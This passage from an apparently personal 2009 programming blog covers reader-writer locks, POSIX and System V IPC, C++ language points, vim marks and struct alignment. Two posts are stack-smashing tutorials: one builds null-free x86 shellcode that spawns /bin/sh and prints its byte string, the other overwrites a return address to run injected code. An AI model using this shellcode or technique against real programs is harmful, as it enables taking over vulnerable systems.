    sem_post(&rw->wlock);
}
void wlock(struct rwlock *rw)
{
    int readers = 0;

    sem_wait(&rw->wlock);

    do {
        if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers == 0) {
  break;
            }
 }

 usleep(1);
    } while (1);
}

void runlock(struct rwlock *rw)
{
    do {
        if (sem_trywait(&rw->rlock) == -1) {
            if (errno != EAGAIN) {
                continue;
            }
        }
        break;
    } while (1);
}

void wunlock(struct rwlock *rw)
{
    sem_post(&rw->wlock);
}
This interface could be used by calling pairs rlock/runlock and wlock/wunlock. Check out next piece of code:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
int *counter;
struct rwlock *rw;

void reader(void)
{
    do {
        rlock(rw);
        printf(">>>>reader: counter %d\n", *counter), fflush(NULL);
        if (*counter == 16777216) {
            runlock(rw);
            break;
        }
        usleep(1);
        runlock(rw);
    } while(1);
}

void writer(void)
{
    do {
        wlock(rw);
        ++*counter;
        printf(">>>>writer: new counter %d\n", *counter), fflush(NULL);
 if (*counter == 16777216) {
            wunlock(rw);
            break;
        }
        wunlock(rw);
    } while (1);
}
int main(int argc, char **argv)
{
    pid_t children[100];
    int i;

    counter = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
    rw = mmap(NULL, sizeof(struct rwlock), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

    *counter = 0;

    init_rwlock(rw);

    for (i=0;i<100;++i) {
        children[i] = fork();
        if (children[i] == -1) {
            printf("Problem with creating %d child: ''", i, strerror(errno)), fflush(NULL);
        }else if (children[i] == 0) {
            if (i%3 == 0) {
                writer();
            }else {
                reader();
            }
        }
    }

    wait(NULL);

    return 0;
}
Here 100 processes have been started where 1/3 are writers. You likely see that here permitted any number of readers. This could be a bottleneck if writer has to wait too long. pthreads rw-lock suffers from the same disease.
To make limitation on readers rlock function should be modified to check amount of readers that are currently holding the lock. With reader limitation rw-lock on semaphores will likely look like:
struct rwlock {
    sem_t rlock;
    sem_t wlock;
    int readers;
};

void init_rwlock(struct rwlock *rw, int readers);
void destroy_rwlock(struct rwlock *rw);
void rlock(struct rwlock *rw);
void runlock(struct rwlock *rw);
void wlock(struct rwlock *rw);
void wunlock(struct rwlock *rw);

void init_rwlock(struct rwlock *rw, int readers)
{
    sem_init(&rw->rlock, 1, 0);
    sem_init(&rw->wlock, 1, 1);
    rw->readers = readers;
}

void destroy_rwlock(struct rwlock *rw)
{
    wlock(rw);

    sem_destroy(&rw->rlock);
    sem_destroy(&rw->wlock);
}

void rlock(struct rwlock *rw)
{
    int readers;
    do {
        sem_wait(&rw->wlock);
 if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers < rw->readers) {

                sem_post(&rw->rlock);

                sem_post(&rw->wlock);

                break;
            }
 }
        sem_post(&rw->wlock);

        usleep(1);
    } while (1);
}

void wlock(struct rwlock *rw)
{
    int readers = 0;

    sem_wait(&rw->wlock);

    do {
        if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers == 0) {
                break;
            }
        }

        usleep(1);
    } while (1);
}

void runlock(struct rwlock *rw)
{
    do {
        if (sem_trywait(&rw->rlock) == -1) {
            if (errno != EAGAIN) {
                continue;
            }
        }
        break;
    } while (1);
}

void wunlock(struct rwlock *rw)
{
    sem_post(&rw->wlock);
}
The semaphores is really powerful tool for building different synchronization schemes.

Tuesday, March 17, 2009

c++: initialzation of the virtual base class

Recently I've touched problem that I haven't ever seen before with virtual base classes.
The problem didn't appeared for me because I haven't used non-default constructor in VBC(virtual base class).
According to standard the most-derived class is responsible for constructing VBC.
You might think that this is not a problem but let's look at the code snippet above:

#include <iostream>

using namespace std;

class VBC
{
  public:
    VBC(const string &i) : i(i) {}
  protected:
    string i;
};

class C : virtual public VBC
{
  public:
    C() : VBC("C") {}
};

class D : public C
{
  public:
    D() : VBC("D") {}
    void print() {cout << i << endl;}
};

int main(int argc, char **argv)
{
    D d;
    d.print();

    return 0;
}
First of all you might notice that class D must have non-trivial constructor to call constructor of VBC class as it is responsible for constructing instance of VBC. That's not a big deal but this depends on what you expect from the virtual base class and what the class hierarchy is. Let's assume that VBC's objection is just to hold the name of the current class instance. Class D stands here just for printing the value of VBC's member i. When d.print() is called you will see 'D' on the output. That's because you called VBC's constructor with argument "D".
Here the problem comes out. Looks like there is no solution how to make class D print 'C'. VBC won't be constructed in class C.
The compiler's behavior becomes more clear when you look at the multiply inheritance model:
class VBC
{
  public:
    VBC(const string &i) : i(i) {}
  protected:
    string i;
};

class C1 : virtual public VBC
{
  public:
    C1() : VBC("C1") {}
};

class C2 : virtual public VBC
{
  public:
    C2() : VBC("C2") {}
};

class D : public C1, public C2
{
  public:
    D() : VBC("D") {}
    void print() {cout << i << endl;}
};
Indeed here it's more clear that for compiler it's an undefined behavior which instance(C1's or C2's) of VBC to choose. Actually for class D neither VBC instance of C1 or C2 is constructed due to the nature of virtual base classes.
For the end user of the class it could be confusing to search for the virtual base class declaration through the hierarchy of inheritance to understand how constructor of virtual base class should be called.
In the Internet I've found a 'solution' that might resolve this issue: create default non-trivial constructor of VBC like this:
class VBC
{
  public:
    VBC(const string &i = "VBC") : i(i) {}
  protected:
    string i;
};

class C1 : virtual public VBC
{
  public:
    C1() : VBC("C1") {cout << i << endl;}
};

class C2 : virtual public VBC
{
  public:
    C2() : VBC("C2") {cout << i << endl;}
};

class D : public C1, public C2
{
  public:
    void print() {cout << i << endl;}
};
The biggest mistake of this solution is that member i of class D inherited from VBC will be initialized with value of "VBC" what is you might expect less among other variants.
Of course virtual inheritance makes sense in multiply inheritance model and such problem is more explicitly recognized there.
Probably the best solution is not to define non-default(even with predefined values of arguments) constructor in virtual base class but this is not that easy in the current world though.

Tuesday, March 10, 2009

linux: sem_open across the processes

Is it safe to use the address of the semaphore in child process obtained in the parent?
According to the man page it's not allowed:

References to copies of the semaphore produce undefined results.

That is true in general, the code below shouldn't work correctly.
int main()
{
 sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);
 switch(fork())
 {
 case -1:
  perror("fork()");

  return 1;

 case 0:
 {
  printf("Child %u waiting for semaphore(%p)...\n",getpid(),sem);
  sem_wait(sem);
  printf("Child: Done\n");
  
  return 0;
 }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%p)...\n",getpid(),sem);
 sem_post(sem);
 printf("Parent: Set\n");

 return 0;

}
But it works. At least in current implementation of linux and glibc.

sem_t is a pointer. You can found out that it's defined as a union but it's used only as a pointer. The union is used for alignment.

Looking into the sem_open.c in glibc sources you may find out that the return value of sem_open is actually the address returned from mmap call.
(sem_t *) mmap(NULL, sizeof (sem_t), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
mmap maps the file in /dev/shm/(or where shmfs is mounted), with name "sem."+name from the sem_open first argument. In case if the semaphore had been already created sem_open searches for its address in the tree of opened semaphores. For the search it uses tuple of name of the file, inode and device.

The tree of opened semaphores is declared in sem_open.c. It's local for the process.

The call to sem_open in the child process will refer to the same tree of the opened semaphores(as the address space is being copied in case of fork) and will return the address from the previous call of sem_open in parent process.

Interesting that the address returned from sem_open will be the same if it was called in the child and in the parent process independently:
#include <stdio.h>
#include <error.h>
#include <errno.h>
#include <semaphore.h>
#include <sys/stat.h>
#include <fcntl.h>

int main()
{
 switch(fork())
 {
 case -1:
  perror("fork()");

  return 1;

 case 0:
 {
  sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);

  printf("Child %u waiting for semaphore(%p)...\n",getpid(),sem);
  sem_wait(sem);
  printf("Child: Done\n");
  
  return 0;
 }
 }

 sleep(1);

 sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);

 printf("Parent %u setting semaphore(%p)...\n",getpid(),sem);
 sem_post(sem);
 printf("Parent: Set\n");

 return 0;

}
$gcc sem-test.c -lrt -o test
$./test 
Child 16116 waiting for semaphore(0xb8062000)...
Parent 16115 setting semaphore(0xb8062000)...
Parent: Set
Child: Done
That is because memory mapped by mmap is preserved across fork, with the same set of attributes.

Tuesday, March 3, 2009

c++: lifetime of temporaries

In c++ you can encounter few types of temporary objects.

Implicitly temporary object is created by compiler when complex expression is being evaluated:

5 + a/4;
Here the result of expression of (a/4) has to be stored somewhere for further calculations.

An anonymous temporary object could be created by programmer when no name is given to an object. Such expression as
4;
is an anonymous temporary object of type int.
When function is intend to return some value it would be also stored into the temporary object.

Of course smart compilers will make some optimizations here to avoid the creation of temporary objects.
The expression
int b = 5 + a/4
could be optimized as storing the result of a/4 to b then adding 5 to b.
The unused return value of the function won't be stored anywhere, moreover compiler may force function not to perform any 'return' actions.

The lifetime of temporary object is ended at the last step in evaluating the full-expression(or block of code) that contains the point where they were created. The temporary object of a/4 in expression 5 + a/4; is being destroyed just after the semicolon.

There is an exception in the standard when you can extend the lifetime of temporary object to the lifetime of const reference that is binded to it:
string get()
{
    return "string";
}
const string &obj = get();
The lifetime of string object created by function get on return is extended to the lifetime of const reference obj.

The temporaries are r-value objects, which means that you can't change their values. So the usage of const reference is mandatory. In pre-standard it's was allowed to use non-const references for temporaries but in ISO-C++ it's a compilation error. Changing value of const object could lead to unexpected results.

Using const references to catch the return value of the function could be used as an optimization of avoiding creating temporary object on function return. Consider this code:
string get()
{
    return "string";
}
string obj = get();
The temporary is created and its value is stored into the string object obj. Binding the return value to const reference could optimize memory usage and avoid extra calls to constructor and destructor in case if you are interested in the result of the function.

However modern compilers use RVO(Return Value Optimization) or NRVO(Named RVO) to avoid creation of temporary objects so in most cases you don't have to care about such optimizations.

Thursday, February 26, 2009

asm: writing shellcode/getting rid of data section and nulls

Most probably you want your shellcode to execute "/bin/sh" on target box. Here you have to deal somehow with string, which in normal programs is stored in data section.

The problem you may face when you are writing a shellcode is that you can't just use data section in your shellode - your shellcode and target application use different data sections.

First of all I've tried to use call instruction. When processor executes call it automatically puts address of the next instruction into esp register. We can use this "feature" keeping in mind that call works with addresses, that means that we can use address of instruction rather than function's.
Let's look at the code below

1 
 2 .global main
 3 
 4 main:
 5     jmp     two
 6 one:
 7     movl    (%esp), %ebx
 8     xor     %eax, %eax 
 9     
10     pushl   %eax
11     pushl   %ebx
12     movl    %esp, %ecx
13     
14     xorl    %edx, %edx
15     
16     movl    $11, %eax 
17     int     $0x80
18 two:
19     call    one
20     .string "/bin/sh"
Just in the beginning processor jumps to label two. Then it executes call: puts address of the next instruction and jumps to label one. Here is the most interesting part. The address of the "next instruction" after the "call one" is our string.
So when we are already in label one we have address of the string "/bin/sh" in esp.
Then the code prepares registers for system call execve. Number of syscall execve(11) to eax, path to executable to ebx, argv array to ecx and envp array to edx. argv array I simulated with pushing values to stack and putting address of the top of the stack to ebx, I don't push any environment variables, so %edx is null.

This code is valid and will execute /bin/sh if you compile it and execute.
(~~) gcc test.s -o test 
(~~) ./test 
sh-3.2#
The problem here is that it contains nulls:
080483b4 <main>:
 80483b4: eb 12                 jmp    80483c8 <two>

080483b6 <one>:
 80483b6: 8b 1c 24              mov    (%esp),%ebx
 80483b9: 31 c0                 xor    %eax,%eax
 80483bb: 50                    push   %eax
 80483bc: 53                    push   %ebx
 80483bd: 89 e1                 mov    %esp,%ecx
 80483bf: 31 d2                 xor    %edx,%edx
 80483c1: b8 0b 00 00 00        mov    $0xb,%eax
 80483c6: cd 80                 int    $0x80

080483c8 <two>:
 80483c8: e8 e9 ff ff ff        call   80483b6 <one>
 80483cd: 2f                    das    
 80483ce: 62 69 6e              bound  %ebp,0x6e(%ecx)
 80483d1: 2f                    das    
 80483d2: 73 68                 jae    804843c <__libc_csu_init+0x4c>
 80483d4: 00 90 90 90 90 90     add    %dl,-0x6f6f6f70(%eax)
 80483da: 90                    nop    
 80483db: 90                    nop    
 80483dc: 90                    nop    
 80483dd: 90                    nop    
 80483de: 90                    nop    
 80483df: 90                    nop    
Almost all stack overflow attacks uses libc string function to overwrite execution point of function or return point with the chellcode. If shellcode contains null characters it could not be read to the end and the attack will fail.
The "main" null is in our string "/bin/sh". execve doesn't work with not a null-ending strings. I tried to make the string like "/bin/shx" and define it as ascii:
.ascii  "/bin/shx"
and later in runtime override the last character with null but all the time I got segmentation violation alert. I suppose that this is because I was trying to modify read-only section. This became a dead-end for me.
I decided to try another way of defining the string. String after all is an array of bytes. So we can just put these bytes somewhere else is some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 
0000000 622f 6e69 732f 0068
Aligned to 4 it still contain null, but this is not a problem, we can divide it into 2-bytes chunks:
622f,6e69,732f,68
And now we can use word-long instructions. Let's look at the updated code of our shell program.
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movl    $11, %eax
22     int     $0x80
I've pushed word-long chunks of the string onto the stack(at first I've pushed zeroed eax to indicate end of string) and put moved address of the head of the stack to ebx. That's almost all. If you still try to compile this code you'd probably find out some zeros. That's because of the movl $11, %eax instruction. 11 could be hold in one byte-long memory node but movl will align memory to 4 bytes with zeros. So just changing from movl to movb will remove this last zero. The latest code should be like
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movb    $11, %al
22     int     $0x80
Compiling it and obtaining the machine codes I can see there is no zeros there:
080483b4 <main>
 80483b4: 31 c0                 xor    %eax,%eax
 80483b6: 50                    push   %eax
 80483b7: 66 6a 68              pushw  $0x68
 80483ba: 66 68 2f 73           pushw  $0x732f
 80483be: 66 68 69 6e           pushw  $0x6e69
 80483c2: 66 68 2f 62           pushw  $0x622f
 80483c6: 89 e3                 mov    %esp,%ebx
 80483c8: 50                    push   %eax
 80483c9: 53                    push   %ebx
 80483ca: 89 e1                 mov    %esp,%ecx
 80483cc: 31 d2                 xor    %edx,%edx
 80483ce: b0 0b                 mov    $0xb,%al
 80483d0: cd 80                 int    $0x80
The shellcode string will look like
"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
"\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

Monday, February 23, 2009

vim: navigation with marks

Each time I touch different systems I realise that ViM is really powerful editor.

Browsing long source files you likely will jump between different pieces of code inside the file.
Of course you can keep in mind the line numbers but if you insert lines the block below will be shifted and so on.

Better way to use marks. Marks is a simple mechanism to navigate through the file.

Here is the list of commands to use marks in ViM:

mx tells Vim to add a mark called x, x could be in range of [a-zA-Z]
`x tells Vim to return to the line and column for mark x
'x tells Vim to return to the beginning of the line where mark x is set
g`x tells Vim to return to the line and column for mark x but don't change the jumplist
g'x tells Vim to return to the beginning of the line where mark x is set  but don't change the jumplist
`. moves the cursor to the line and column where the last edit was made
'. moves the cursor to the line where the last edit was made
'" moves the cursor to the last position of the cursor when you exited the previous session
'' moves the cursor to the line before the latest jump
`` moves the cursor to the line and column before the latest jump
:marks shows all marks set
:jumps shows the jumplist
Ctrl-o moves the cursor to the last jump
Ctrl-i moves the cursor to the previous jump

Marks with lowercase names are valid within one file, marks with uppercase names are valid between files.

Lowercase marks are remembered as long as the file remains in the
buffer list.
Uppercase marks include the file name. It's possible to use them to jump from file to file.

Worth to mention that the line number of the mark remains correct, even if you insert/delete lines or edit another file for a moment.

Marks could be used with common ViM operations: d, y, etc.
For example y'x tells ViM to copy text between current position and mark x into the buffer.

Special marks ' and ` could be used as lowercase marks - you can set their position.

There are a lot of other special marks, which description you can find in ViM manual.

Tuesday, February 10, 2009

linux: key for sem_open/shm_open

sem_open and shm_open are used to associate key with system semaphore and shared memory object accordingly.
I used them without any problems with a key randomly generated until I started to fail to receive valid object descriptors with ENOENT("No such file or directory").
According to man pages ENOENT could happen if there was an attempt to open an object with a name that did not exist, and O_CREAT was not specified.
I wondered why that could happen because I used O_CREAT and if even object didn't exist with given name it should be created.
I remember that in linux named semaphores and shared data objects are being created in a virtual filesystem usually mounted under /dev/shm.
I started to analyze the key I used to generate.
The problem was that in the name I've generated could appear slash characters and characters not conforming to filesystem valid file name. That caused failure of creating inode on the filesystem and sem_open and shm_open failed also.

To summarize the key for sem_open and shm_open should have leading slash and contain no other slashes or non-valid characters of file name on filesystem. This is of course implementation-defined but for portability this rule should be used to generate the key.

Some notes for FreeBSD.
sem_open is known to be buggy in FreeBSD. The name of semaphore shouldn't be longer than 13 characters.
shm_open behaves differently in FreeBSD than in Linux. path argument should be valid pathname within filesystem. shm_open is a wrapper over open libc call. So the best solution to generate path with tmpnam from libc to make it unique or to prefix with '/tmp/' for other cases to ensure that this file won't be lost somewhere in the filesystem. shm_unlink should remove it but in case of application crush it could not happen.

Thursday, February 5, 2009

blog: prettify

I've used jquery and Javascript code prettifier to make the code snippets look more readable.
I'm too lazy and made the things automatic. So some pieces of posts(especially of the programs' output) don't look good. In the future I'll try to fix this.

Tuesday, February 3, 2009

*nix: XSI shared memory

When you work with POSIX shared memory objects you can get the size of the shared memory space assigned to key by opening with shm_open routine and and checking st_size field of struct stat obtained from fstat libc call. Then you use this value to map memory area into the userspace with mmap.

With System V IPC model you are using int shmget(key_t key, size_t size, int shmflg) routine to map the shared memory. For mapping already existing object you should call it with value of size exactly to the size of existing shared memory object. According to man pagesyou'll get EINVAL in case of size is less than the system-imposed minimum or greater than the system-imposed maximum. Also you are not allowed to specify size less than actual size of existing memory segment for the key.
In some manuals I saw remark for tuple of EINVAL and size:

[EINVAL]
No shared memory segment is to be created and a shared memory segment exists for key but the size of the segment associated with it is less than size and size is not 0.

In comp.programming.threads there was a discussion regarding size argument for shmget. From the conversation I concluded that size is used _only_for_creation_ of the memory segment.
Walking through the sources of linux kernel I've found that if the key exists and other lags are ok, the kernel finally calls shm_more_checks:
static inline int shm_more_checks(struct kern_ipc_perm *ipcp,
                                struct ipc_params *params)
{
        struct shmid_kernel *shp;

        shp = container_of(ipcp, struct shmid_kernel, shm_perm);
        if (shp->shm_segsz < params->u.size)
                return -EINVAL;

        return 0;
}
shm_more_checks indeed just checks if requested size is less or equal than the size of the shared object and if this conditions is satisfied this routine successfully returns.

While we couldn't know the actual size of the shared memory segment we can do a trick and pass 0 as a size to shmget. Later shmctl could be used to check the actual size.

I wrote sample dummy programs that proves the thesis above.

Writer, creates shared memory object and writes argv[1] into it
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define SHM_KEY 0x0001b6e6

int main(int argc, char *argv[])
{
        if (argc < 2)
        {
                printf("usage: writer \"[data to write]\"\n");

                return 1;
        }

        int size = strlen(argv[1]);

        int shmid = shmget(SHM_KEY, size + 1, 0644 | IPC_CREAT);

        char *data = shmat(shmid, NULL, 0); 
        strncpy(data, argv[1], size);

        shmdt(data);

        fgetc(stdin);

        shmctl(shmid, IPC_RMID, NULL);

        return 0;
}

Reader, gets the shared object, checks the size and copies data from the shared memory segment:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define SHM_KEY 0x0001b6e6

int main(int argc, char *argv[])
{
        int shmid = shmget(SHM_KEY, 0, 0644 | IPC_CREAT);

        struct shmid_ds ds; 
        shmctl(shmid, IPC_STAT, &ds);
        printf("Size: \"%d\"\n", ds.shm_segsz);

        char *data = shmat(shmid, NULL, 0); 
        printf("Sata: \"%s\"\n", data);

        shmdt(data); 

        return 0;
}

The output of these programs:
$ ./writer "some text"

$ ipcs -m | awk '{if ($1 == "0x0001b6e6" || $1 == "key") {print $0}}'
key        shmid      owner      perms      bytes      nattch     status      
0x0001b6e6 11829291   niam      644        10         0

$ ./reader 
Size: "10"
Sata: "some text"
And for another input data for writer to insure that this works as expected:
$ ./writer "some longer text"

$ ipcs -m | awk '{if ($1 == "0x0001b6e6" || $1 == "key") {print $0}}'
key        shmid      owner      perms      bytes      nattch     status      
0x0001b6e6 11862059   niam      644        17         0

$ ./reader 
Size: "17"
Sata: "some longer text"

Tuesday, January 27, 2009

c: alignment of structure

In this article I assume that the computer's word size is 4 bytes(IA32), because the main idea is the same for all architectures and I want to keep the article clean. You just have to adjust this article to your platform.

So, what's with the size of the structure?
You should know that members of data structure(represented by struct keyword in c) are aligned to the power of 2. Each element is stored in the closest(next) address with the appropriate alignment. The whole structure should be aligned as aligned its member with the longest alignment.
The type of each member of the structure usually has a default alignment(if you are not using #pragma pack directive). It's 1 byte for char, 2 bytes for short, 4 bytes for int. You should check this table for your arch.
So the structure

struct
{   
    char a;
    short b;
    int c;
} data;
should be 8 bytes long. How is it calculated? The structure has one char, one short and one int members. The alignment should look like
+-----------------------------------+
|char| XX |  short |       int      |
+-----------------------------------+
0         2        4                8
The short member is stored on the distance of 2 bytes from the address of char because the alignment of short is 2 bytes, the int member is stored just after the short, because the address from the beginning(in this case, or in general from the previously aligned members) is suitable for alignment of int.
But if you change the sequence of the members the whole picture could change, though the number of members and their sizes didn't change. The structure
struct
{   
    char a;
    int c;
    short b;
} data;
on the same platform should be 12 bytes long. Why? Let's calculate.
+---------------------------------------------+
|char| XX | XX | XX |       int      |  short |
+---------------------------------------------+
0         2        4                8         12
That's because the address of integer member is adjusted to its alignment.

Knowing these rules you can optimize the sizes of the structures just moving position of the members inside the structure. Let's add one char in the end to the previously declared structure:
struct
{   
    char a;
    short b;
    int c;
    char d;
} data;
The size of the structure is 12. It's easy to calculate. The size of the structure should be as aligned its member with the longest alignment. In this case the longest alignment is 4. Sequence of char, short, int is aligned to 8 bytes. Adding one char to the end you force compiler to align the structure to 12 bytes, it can't be 9 or anything else. If you look at the alignment of the original structure you could see unused byte that appeared because of the alignment. Let's move d just after(or before, doesn't matter) the a structure member:
struct
{   
    char a;
    char d;
    short b;
    int c;
} data;
The size of this structure should be 8 bytes.
+-----------------------------------+
|char|char|  short |       int      |
+-----------------------------------+
0         2        4                8
If you deal with embed devices where you have significantly small amount of memory it's good optimization. 8 bytes vs. 12 bytes, or 1K vs. 1.5K in case of 128 copies of the structure.

Another approach which is also platform and compiler dependent is to use #pragma pack directive. In general structure
struct
{   
    int c;
    short b;
} data;
should be 8 bytes long. But if you use #pragma pack with alignment to 2 bytes you may force the whole structure will be aligned to 2 bytes.
#pragma pack(push)
#pragma pack(2)

struct
{   
    int c;
    short b;
} data;

#pragma pack(pop)
This structure should be 6 bytes long.

The alignment can cause troubles especially if the data is transmitted between different platforms where alignment or size of type may differ. If it's possible strings(sequences of bytes/chars) should be used. Their alignment should always be 1 byte long.

Tuesday, January 20, 2009

c: executing shellcode

In previous article I've described how to overwrite function's return point to execute some code.
I *nix world most of the code is being written in c. So most likely you will have to deal with stack overflows in c.

The basics remain the same. You have to find the top of the stack of a function, calculate the address of the return point and write the beginning of your code into it.
Let's look at the code below.

#include <stdio.h>

void function()
{
    int *p;
    printf("&p: %p\n", &p);
}

int main(int argc, char **argv)
{
    function();

    return 0;
}
The address of pointer p should be the top of the stack of our function. The output should looks like
&p: 0xbffdf594
The address might change between the program execution. Running this program in gdb, stopping in the beginning of the function and looking at address of p and values of the register you can see that the difference between the &p and %esp is 4 bytes.
(gdb) l
2 
3 void function()
4 {
5     int *p;
6     printf("&p: %p\n", &p);
7 }
8 
9 int main(int argc, char **argv)
10 {
11     function();
(gdb) b 5
Breakpoint 1 at 0x804838a: file so.c, line 5.
(gdb) r
Breakpoint 1, function () at so.c:6
6     printf("&p: %p\n", &p);
(gdb) i r
esp            0xbff2d490 0xbff2d490
ebp            0xbff2d4a8 0xbff2d4a8
...
(gdb) p &p
$1 = (int **) 0xbff2d4a4
Indeed, &p is on the top of the stack. We should take into account that usually %ebp is pushed onto the stack, so the difference between &p and return point is 8 bytes.
(gdb) disass
Dump of assembler code for function function:
0x08048384 <function+0>: push   %ebp
0x08048385 <function+1>: mov    %esp,%ebp
0x08048387 <function+3>: sub    $0x18,%esp
0x0804838a <function+6>: lea    -0x4(%ebp),%eax
0x0804838d <function+9>: mov    %eax,0x4(%esp)
0x08048391 <function+13>: movl   $0x80484a0,(%esp)
0x08048398 <function+20>: call   0x8048298 <printf@plt>
0x0804839d <function+25>: leave  
0x0804839e <function+26>: ret    
We are almost ready for the hack. Let's write some shellcode that would be executed instead of returning from function to main.
I'm not strong in writing shellcode and asm, so let it be simple code that will call exit with exit code 1. The asm code is
.text

.global main
main:
movl $1, %eax
movl $1, %ebx
int $0x80
Having compiled and linked code is not enough, we can't just put ELF binary as a shellcode. I used objdump to extract disassembled code of main and its representation in machine commands.
$objdump -d shellcode
...
08048354 <main>:
 8048354: b8 01 00 00 00        mov    $0x1,%eax
 8048359: bb 01 00 00 00        mov    $0x1,%ebx
 804835e: cd 80                 int    $0x80
...
The code begins from address 8048354 and ends at 8048360. To use the instructions as a shellcode they should be put into an ascii zero-ended string where each code is prefixed with '\x'. The string with shellcode will be "\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80".
Let's integrate the shellcode into our program.
#include <stdio.h>

char shellcode[] = "\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80";

void function()
{
    int *p; 
    printf("&p: %p\n", &p);
    p = (int *)&p + 2;
    *p = (int)shellcode;
}

int main(int argc, char **argv)
{
    function();

    return 0;
}
Here I assigned the address of &p plus 8 bytes, which should be the return point, to the pointer. So p now points exactly to the return point. Later I write the address of the shellcode to *p, that is actually a return point.
If you execute this code and check the exit code you should see
$./so
&p: 0xbfd262e8
$echo $?
1
As expected the program exited with code 1. Let's walk through the execution process.
(gdb) l
6 {
7     int *p;
8     printf("&p: %p\n", &p);
9     p = (int *)&p + 2;
10     *p = (int)shellcode;
11 }
12 
13 int main(int argc, char **argv)
14 {
15     function();
(gdb) b 11
Breakpoint 1 at 0x80483b0: file so.c, line 11.
(gdb) r
&p: 0xbff2d4a4

Breakpoint 1, function () at so.c:11
11 }
(gdb) n
0x080495b8 in shellcode ()
(gdb) disass
Dump of assembler code for function shellcode:
0x080495b8 <shellcode+0>: mov    $0x1,%eax
0x080495bd <shellcode+5>: mov    $0x1,%ebx
0x080495c2 <shellcode+10>: int    $0x80
0x080495c4 <shellcode+12>: add    %al,(%eax)
Instead of returning to main the execution moved to the address 0x080495b8. Disassembled code of the shellcode is exactly the same as we have generated.

Actually this shellcode won't work in the real world because it contains null-bytes. Mostly buffer overflow attacks are used against string functions from libc and they will cut this code.

A lot of interesting shellcodes you may find at the metasploit project site.

Please note, I've suceeded with runnning this code with gcc-4.3.2 and linux-2.6.27.
With gcc-4.1.2, gcc-3.4.6 and linux-2.6.25 I didn't succeed to run the shellcode and ran into segfault with and without -fno-stack-protector gcc flag. I've also checked kernel.randomize_va_space system parameter but switching it to the different values didn't help. Unfortunately I don't know why this is not working. Actually it's failing on
mov    $0x1,%eax
I have no idea why writing value to the register causes segfault. Most likely that's not a gcc 'issue' but kernel(or kernel configuration), because my kernel 2.6.27 is not secure at all because I'm sitting behind the firewall and some performance benefit by turning off security features is critical for me.

Tuesday, January 13, 2009

c++: partial template specialization of class methods

In c++ it's possible to specify class method of template class.
Before I thought it's only possible to specify the whole class and then redefine functions. It could be painful if template class contains a lot of methods. Of course the expected class could be built deriving from template class specifying the new type and redefining needed functions:

template<typename T>
class B
{
    public:
        void operator ()()
        {  
            std::cout << "B<" << typeid(T).name() << ">::operator ()" << std::endl;
        }  
        void method()
        {  
            std::cout << "B<" << typeid(T).name() << ">::method()" << std::endl;
        }  
};

class C: public B<int>
{
    public:
        void operator ()()
        {  
            std::cout << "C<long#pseudo class specialization>::operator () with deriving from B<int>" << std::endl;
        }  
};
int main(int argc, char **argv)
{
    C()();
    C().method();
}
The output you expect should be
C<long#pseudo class specialization>::operator () with deriving from B<int>
B<i>::method()
We get the class C which is the same as B<int> but with custom operator ().
Unfortunately this code changes the name of the class and developer should keep in mind that class C is B<int> with custom functions. This is not explicit even if you find better name than C.

Another way, that is a c++ way, to specify methods of template class. Let's say we have class A defined below:
template<typename T0>
class A
{
    public:
        void operator ()()
        {
            std::cout << "A<" << typeid(T0).name() << ">::operator ()" << std::endl;
        }
        template<typename T1>
        void method()
        {
            std::cout << "A<" << typeid(T0).name() << ">::method<" << typeid(T1).name() << ">()" << std::endl;
        }
};
Here we can redefine both operator () and method() class methods:
template<>
void
A<float>::operator ()()
{
    std::cout << "A<float#method specialization>::operator ()" << std::endl;
}

template<>
template<>
void
A<float>::method<float>()
{
    std::cout << "A<float#method specialization>::method<float#method specialization>()" << std::endl;
}
operator () for A<float> and method<float> for A<float> have been specified. What actually happen? There was created fully specified class A for type float and both of its methods have been defined.
The output of
int main(int argc, char **argv)
{
    A<int>()();
    A<float>()();
    A<float>().method<float>();

    return 0;
}
should be
A<i>::operator ()
A<float#method specialization>::operator ()
A<float#method specialization>::method<float#method specialization>()
You can see that appropriate methods have been called.

As I mentioned before, if you do a class specialization you have to redefine all methods:
template<>
class A<double>
{
    public:
        void operator ()()
        {  
            std::cout << "A<double#class specialization>::operator ()" << std::endl;
        }  
        template<typename T1>
        void method()
        {  
            std::cout << "A<double#class specialization>::method<" << typeid(T1).name() << ">()" << std::endl;
        }  
};
